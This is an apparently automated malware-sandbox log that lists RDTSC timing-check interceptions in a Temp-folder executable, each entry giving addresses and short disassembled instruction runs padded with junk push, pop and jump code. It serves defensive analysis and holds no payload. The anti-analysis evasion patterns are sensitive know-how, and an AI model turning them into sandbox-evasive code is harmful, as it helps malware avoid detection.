Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844BF4 second address: 844BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844BF9 second address: 844C03 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844C03 second address: 844C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844C19 second address: 844C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844C26 second address: 844C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844C2A second address: 844C30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844F3B second address: 844F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844F3F second address: 844F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 844F43 second address: 844F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 84553F second address: 845543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 845543 second address: 845549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 845549 second address: 84554F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 845B05 second address: 845B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAF7C6A41ABh 0x00000010 push esi 0x00000011 jmp 00007FAF7C6A41ACh 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 845B29 second address: 845B2E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 845DC5 second address: 845DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 845DD2 second address: 845DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 84BA94 second address: 84BA9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 84BA9A second address: 84BAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 84BAA0 second address: 84BAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 84BE88 second address: 84BE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 84BE8C second address: 84BEA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FAF7C6A41B2h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 84BEA8 second address: 84BEAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 84BFFA second address: 84C03D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FAF7C6A41C2h 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FAF7C6A41ACh 0x00000019 jc 00007FAF7C6A41A8h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 84C03D second address: 84C055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D43h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 84C1BC second address: 84C1D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FAF7C6A41A6h 0x0000000b jng 00007FAF7C6A41A6h 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 850AEF second address: 850AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 850AF3 second address: 850B13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FAF7C6A41A6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 850B13 second address: 850B24 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAF7CBD5D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 85827D second address: 858281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 858281 second address: 8582A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D48h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FAF7CBD5D50h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 856397 second address: 85639B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8564EF second address: 856506 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 856506 second address: 856512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FAF7C6A41A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 856512 second address: 856546 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007FAF7CBD5D36h 0x0000000b jmp 00007FAF7CBD5D47h 0x00000010 popad 0x00000011 push esi 0x00000012 jnc 00007FAF7CBD5D36h 0x00000018 pop esi 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 856546 second address: 85654A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 85654A second address: 856558 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FAF7CBD5D36h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 856949 second address: 856967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FAF7C6A41B9h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 856967 second address: 856981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 856AC2 second address: 856AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 856AC6 second address: 856AF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FAF7CBD5D45h 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FAF7CBD5D3Ah 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 856C5E second address: 856C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 856C64 second address: 856C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8570B2 second address: 8570CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAF7C6A41AEh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 857A32 second address: 857A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 855F73 second address: 855F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 85A7BD second address: 85A7C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 85A7C1 second address: 85A7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 85A7CD second address: 85A7D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 85A7D3 second address: 85A7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 85BF85 second address: 85BF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 85ED60 second address: 85ED7A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FAF7C6A41AAh 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 85ED7A second address: 85ED90 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007FAF7CBD5D46h 0x0000000d pushad 0x0000000e jc 00007FAF7CBD5D36h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 864F5A second address: 864F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7C6A41AFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 864F6D second address: 864F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8649C7 second address: 8649CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8649CB second address: 8649E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D3Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 873B4E second address: 873B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41ADh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FAF7C6A41B3h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 pop esi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 87C269 second address: 87C271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 87C271 second address: 87C2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41B1h 0x00000009 jp 00007FAF7C6A41A6h 0x0000000f popad 0x00000010 popad 0x00000011 jc 00007FAF7C6A41D8h 0x00000017 jmp 00007FAF7C6A41ADh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FAF7C6A41B3h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 87C2B6 second address: 87C2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 87C2BA second address: 87C2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 87E77D second address: 87E781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 887335 second address: 88734C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B0h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 88734C second address: 88736B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jng 00007FAF7CBD5D4Bh 0x0000000e jmp 00007FAF7CBD5D3Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8871E0 second address: 8871EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FAF7C6A41A6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8871EC second address: 8871FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FAF7CBD5D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 88E2E6 second address: 88E2F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FAF7C6A41A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 88CCB2 second address: 88CCB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 88CCB6 second address: 88CCBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 88CCBA second address: 88CCC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 88D630 second address: 88D654 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ACh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FAF7C6A41AAh 0x00000011 pop edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 88D654 second address: 88D658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 891C29 second address: 891C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8916ED second address: 89174A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FAF7CBD5D48h 0x0000000d popad 0x0000000e jnp 00007FAF7CBD5D4Ah 0x00000014 jmp 00007FAF7CBD5D3Eh 0x00000019 jne 00007FAF7CBD5D36h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jnp 00007FAF7CBD5D45h 0x00000028 jmp 00007FAF7CBD5D3Fh 0x0000002d jc 00007FAF7CBD5D3Eh 0x00000033 push esi 0x00000034 pop esi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 89174A second address: 89174E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 89174E second address: 891765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FAF7CBD5D36h 0x0000000a jmp 00007FAF7CBD5D3Dh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 891765 second address: 89176F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF7C6A41A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8918CF second address: 8918DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF7CBD5D42h 0x00000008 jns 00007FAF7CBD5D36h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 893EFD second address: 893F1F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF7C6A41B7h 0x00000008 jmp 00007FAF7C6A41B1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 893F1F second address: 893F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 896BC4 second address: 896BD5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FAF7C6A41A6h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 896BD5 second address: 896BDF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF7CBD5D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8B1C98 second address: 8B1C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8B1C9E second address: 8B1CC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FAF7CBD5D3Eh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8B1B1E second address: 8B1B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8B1B22 second address: 8B1B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8B4872 second address: 8B487A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8B487A second address: 8B4882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8B456E second address: 8B4572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8CD51E second address: 8CD539 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAF7CBD5D36h 0x00000008 jnp 00007FAF7CBD5D36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007FAF7CBD5D3Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe RDTSC instruction interceptor: First address: 8CD539 second address: 8CD53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
